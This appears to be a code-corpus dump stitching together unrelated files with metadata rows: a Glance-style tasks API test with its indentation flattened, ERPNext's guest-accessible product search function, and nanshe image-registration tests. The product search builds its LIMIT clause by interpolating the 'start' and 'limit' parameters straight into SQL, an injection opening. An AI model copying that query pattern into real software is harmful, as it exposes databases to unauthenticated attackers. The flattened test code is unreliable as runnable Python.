data = json.loads(content)
self.assertIsNotNone(data)
self.assertEqual(expected_schema, data)
# 1. GET /schemas/tasks
# Verify schema for tasks
path = "/v2/schemas/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
schema = tasks.get_collection_schema()
expected_schema = schema.minimal()
data = json.loads(content)
self.assertIsNotNone(data)
self.assertEqual(expected_schema, data)
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_create_new_task(self):
# 0. POST /tasks
# Create a new task with valid input and type
task_data = _new_task_fixture()
task_owner = 'tenant1'
body_content = json.dumps(task_data)
path = "/v2/tasks"
response, content = self.http.request(
path, 'POST', headers=minimal_task_headers(task_owner),
body=body_content)
self.assertEqual(201, response.status)
data = json.loads(content)
task_id = data['id']
self.assertIsNotNone(task_id)
self.assertEqual(task_owner, data['owner'])
self.assertEqual(task_data['type'], data['type'])
self.assertEqual(task_data['input'], data['input'])
# 1. POST /tasks
# Create a new task with invalid type
# Expect BadRequest(400) Error as response
task_data = _new_task_fixture(type='invalid')
task_owner = 'tenant1'
body_content = json.dumps(task_data)
path = "/v2/tasks"
response, content = self.http.request(
path, 'POST', headers=minimal_task_headers(task_owner),
body=body_content)
self.assertEqual(400, response.status)
        # 2. POST /tasks
# Create a new task with invalid input for type 'import'
# Expect BadRequest(400) Error as response
task_data = _new_task_fixture(task_input='{something: invalid}')
task_owner = 'tenant1'
body_content = json.dumps(task_data)
path = "/v2/tasks"
response, content = self.http.request(
path, 'POST', headers=minimal_task_headers(task_owner),
body=body_content)
self.assertEqual(400, response.status)
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_tasks_with_filter(self):
# 0. GET /v2/tasks
# Verify no tasks
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
content_dict = json.loads(content)
self.assertFalse(content_dict['tasks'])
task_ids = []
# 1. Make 2 POST requests on /tasks with various attributes
task_owner = TENANT1
data, req_input1 = self._post_new_task(owner=task_owner)
task_ids.append(data['id'])
task_owner = TENANT2
data, req_input2 = self._post_new_task(owner=task_owner)
task_ids.append(data['id'])
# 2. GET /tasks
# Verify two import tasks
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
content_dict = json.loads(content)
self.assertEqual(2, len(content_dict['tasks']))
# 3. GET /tasks with owner filter
# Verify correct task returned with owner
params = "owner=%s" % TENANT1
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
content_dict = json.loads(content)
self.assertEqual(1, len(content_dict['tasks']))
self.assertEqual(TENANT1, content_dict['tasks'][0]['owner'])
# Check the same for different owner.
params = "owner=%s" % TENANT2
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
content_dict = json.loads(content)
self.assertEqual(1, len(content_dict['tasks']))
self.assertEqual(TENANT2, content_dict['tasks'][0]['owner'])
# 4. GET /tasks with type filter
# Verify correct task returned with type
params = "type=import"
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
content_dict = json.loads(content)
self.assertEqual(2, len(content_dict['tasks']))
actual_task_ids = [task['id'] for task in content_dict['tasks']]
self.assertEqual(set(task_ids), set(actual_task_ids))
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_limited_tasks(self):
"""
Ensure marker and limit query params work
"""
# 0. GET /tasks
# Verify no tasks
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
tasks = json.loads(content)
self.assertFalse(tasks['tasks'])
task_ids = []
# 1. POST /tasks with three tasks with various attributes
task, _ = self._post_new_task(owner=TENANT1)
task_ids.append(task['id'])
task, _ = self._post_new_task(owner=TENANT2)
task_ids.append(task['id'])
task, _ = self._post_new_task(owner=TENANT3)
task_ids.append(task['id'])
# 2. GET /tasks
# Verify 3 tasks are returned
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
tasks = json.loads(content)['tasks']
self.assertEqual(3, len(tasks))
# 3. GET /tasks with limit of 2
# Verify only two tasks were returned
params = "limit=2"
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(2, len(actual_tasks))
self.assertEqual(tasks[0]['id'], actual_tasks[0]['id'])
self.assertEqual(tasks[1]['id'], actual_tasks[1]['id'])
# 4. GET /tasks with marker
# Verify only two tasks were returned
params = "marker=%s" % tasks[0]['id']
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(2, len(actual_tasks))
self.assertEqual(tasks[1]['id'], actual_tasks[0]['id'])
self.assertEqual(tasks[2]['id'], actual_tasks[1]['id'])
# 5. GET /tasks with marker and limit
# Verify only one task was returned with the correct id
params = "limit=1&marker=%s" % tasks[1]['id']
path = "/v2/tasks?%s" % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(1, len(actual_tasks))
self.assertEqual(tasks[2]['id'], actual_tasks[0]['id'])
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_ordered_tasks(self):
# 0. GET /tasks
# Verify no tasks
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
tasks = json.loads(content)
self.assertFalse(tasks['tasks'])
task_ids = []
# 1. POST /tasks with three tasks with various attributes
task, _ = self._post_new_task(owner=TENANT1)
task_ids.append(task['id'])
task, _ = self._post_new_task(owner=TENANT2)
task_ids.append(task['id'])
task, _ = self._post_new_task(owner=TENANT3)
task_ids.append(task['id'])
        # 2. GET /tasks with no query params
        # Verify three tasks are returned, sorted by created_at desc
path = "/v2/tasks"
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(3, len(actual_tasks))
self.assertEqual(task_ids[2], actual_tasks[0]['id'])
self.assertEqual(task_ids[1], actual_tasks[1]['id'])
self.assertEqual(task_ids[0], actual_tasks[2]['id'])
# 3. GET /tasks sorted by owner asc
params = 'sort_key=owner&sort_dir=asc'
path = '/v2/tasks?%s' % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
expected_task_owners = [TENANT1, TENANT2, TENANT3]
expected_task_owners.sort()
actual_tasks = json.loads(content)['tasks']
self.assertEqual(3, len(actual_tasks))
self.assertEqual(expected_task_owners,
[t['owner'] for t in actual_tasks])
# 4. GET /tasks sorted by owner desc with a marker
params = 'sort_key=owner&sort_dir=desc&marker=%s' % task_ids[0]
path = '/v2/tasks?%s' % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(2, len(actual_tasks))
self.assertEqual(task_ids[2], actual_tasks[0]['id'])
self.assertEqual(task_ids[1], actual_tasks[1]['id'])
self.assertEqual(TENANT3, actual_tasks[0]['owner'])
self.assertEqual(TENANT2, actual_tasks[1]['owner'])
# 5. GET /tasks sorted by owner asc with a marker
params = 'sort_key=owner&sort_dir=asc&marker=%s' % task_ids[0]
path = '/v2/tasks?%s' % params
response, content = self.http.request(path, 'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
actual_tasks = json.loads(content)['tasks']
self.assertEqual(0, len(actual_tasks))
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
def test_delete_task(self):
# 0. POST /tasks
# Create a new task with valid input and type
task_data = _new_task_fixture()
task_owner = 'tenant1'
body_content = json.dumps(task_data)
path = "/v2/tasks"
response, content = self.http.request(
path, 'POST', headers=minimal_task_headers(task_owner),
body=body_content)
self.assertEqual(201, response.status)
data = json.loads(content)
task_id = data['id']
# 1. DELETE on /tasks/{task_id}
# Attempt to delete a task
path = "/v2/tasks/%s" % task_id
response, content = self.http.request(path,
'DELETE',
headers=minimal_task_headers())
self.assertEqual(405, response.status)
self.assertEqual('GET', response.webob_resp.headers.get('Allow'))
self.assertEqual(('GET',), response.webob_resp.allow)
self.assertEqual(('GET',), response.allow)
# 2. GET /tasks/{task_id}
# Ensure that methods mentioned in the Allow header work
path = "/v2/tasks/%s" % task_id
response, content = self.http.request(path,
'GET',
headers=minimal_task_headers())
self.assertEqual(200, response.status)
self.assertIsNotNone(content)
# NOTE(nikhil): wait for all task executions to finish before exiting
# else there is a risk of running into deadlock
self._wait_on_task_execution()
| apache-2.0 | 8,380,838,150,023,207,000 | 35.352087 | 79 | 0.565202 | false |
ThiagoGarciaAlves/erpnext | erpnext/templates/pages/product_search.py | 29 | 1184 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr
from erpnext.setup.doctype.item_group.item_group import get_item_for_list_in_html
no_cache = 1
no_sitemap = 1
@frappe.whitelist(allow_guest=True)
def get_product_list(search=None, start=0, limit=10):
# base query
query = """select name, item_name, page_name, website_image, item_group,
web_long_description as website_description, parent_website_route
from `tabItem` where show_in_website = 1"""
# search term condition
if search:
query += """ and (web_long_description like %(search)s
or description like %(search)s
or item_name like %(search)s
or name like %(search)s)"""
search = "%" + cstr(search) + "%"
# order by
query += """ order by weightage desc, modified desc limit %s, %s""" % (start, limit)
data = frappe.db.sql(query, {
"search": search,
}, as_dict=1)
for d in data:
d.route = ((d.parent_website_route + "/") if d.parent_website_route else "") \
+ d.page_name
return [get_item_for_list_in_html(r) for r in data]
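# Usage sketch (the function is whitelisted, so it is normally reached over the
# website's REST/JS API; the values below are illustrative):
#
#     get_product_list(search="chair", start=0, limit=10)
#     # -> a list of rendered list-item HTML snippets, one per matching website item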
| agpl-3.0 | -3,131,648,091,549,166,000 | 29.358974 | 85 | 0.688345 | false |
jakirkham/nanshe | tests/test_nanshe/test_imp/test_registration.py | 3 | 24055 | __author__ = "John Kirkham <[email protected]>"
__date__ = "$Feb 20, 2015 10:40:15 EST$"
import nose
import nose.plugins
import nose.plugins.attrib
import os
import shutil
import tempfile
import h5py
import numpy
import nanshe.io.hdf5.serializers
import nanshe.imp.registration
from past.builtins import basestring
class TestRegisterMeanOffsets(object):
def test0a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test1a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test2a(self):
a = numpy.zeros((20,11,12), dtype=int)
a[:, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test3a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test4a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test5a(self):
a = numpy.zeros((20,11,12), dtype=int)
a[:, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test6a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test7a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test8a(self):
a = numpy.zeros((20,11,12), dtype=int)
a[:, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test9a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test10a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test11a(self):
a = numpy.zeros((20,11,12), dtype=int)
a[:, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test12a(self):
cwd = os.getcwd()
temp_dir = ""
try:
temp_dir = tempfile.mkdtemp()
os.chdir(temp_dir)
with h5py.File("in.h5", "w") as f:
a = f.create_dataset(
"a", shape=(20, 11, 12), dtype=int, chunks=True
)
a[:, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a[...])
a[10] = 0
a[10, :-7, :-7] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
assert isinstance(fn, basestring)
assert os.path.exists(fn)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
finally:
os.chdir(cwd)
if temp_dir:
shutil.rmtree(temp_dir)
def test13a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(
a, float_type=numpy.float32
)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
def test14a(self):
a = numpy.zeros((20,10,11), dtype=int)
a[:, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6] = 1
b[10, :, :3] = numpy.ma.masked
b[10, :3, :] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(
a, float_type="float32"
)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test0b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test1b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6, :-6] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test2b(self):
a = numpy.zeros((20,11,12,13), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(a)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test3b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test4b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6, :-6] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test5b(self):
a = numpy.zeros((20,11,12,13), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=10
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test6b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test7b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6, :-6] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test8b(self):
a = numpy.zeros((20,11,12,13), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test9b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test10b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-6, :-6, :-6] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test11b(self):
a = numpy.zeros((20,11,12,13), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=30
)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test12b(self):
cwd = os.getcwd()
temp_dir = ""
try:
temp_dir = tempfile.mkdtemp()
os.chdir(temp_dir)
with h5py.File("in.h5", "w") as f:
a = f.create_dataset(
"a", shape=(20, 11, 12, 13), dtype=int, chunks=True
)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a[...])
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
fn = nanshe.imp.registration.register_mean_offsets(
a, block_frame_length=7
)
assert isinstance(fn, basestring)
assert os.path.exists(fn)
b2 = None
with h5py.File(fn, "r") as f:
b2g = f["reg_frames"]
b2d = nanshe.io.hdf5.serializers.HDF5MaskedDataset(b2g)
b2 = b2d[...]
os.remove(fn)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
finally:
os.chdir(cwd)
if temp_dir:
shutil.rmtree(temp_dir)
@nose.plugins.attrib.attr("3D")
def test13b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(
a, float_type=numpy.float32
)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
@nose.plugins.attrib.attr("3D")
def test14b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
b = numpy.ma.masked_array(a.copy())
a[10] = 0
a[10, :-7, :-7, :-7] = 1
b[10, :3, :, :] = numpy.ma.masked
b[10, :, :3, :] = numpy.ma.masked
b[10, :, :, :3] = numpy.ma.masked
b2 = nanshe.imp.registration.register_mean_offsets(
a, float_type="float32"
)
assert (b2.dtype == b.dtype)
assert (b2.data == b.data).all()
assert (b2.mask == b.mask).all()
class TestFindOffsets(object):
def test0a(self):
a = numpy.zeros((20,10,11), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-3, 3:-3] = 1
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
def test1a(self):
a = numpy.zeros((20,10,11), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-3, 3:-3] = 1
a[10] = 0
a[10, :-6, :-6] = 1
a_off[10] = a.shape[1:]
a_off[10] -= 3
numpy.negative(a_off, out=a_off)
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
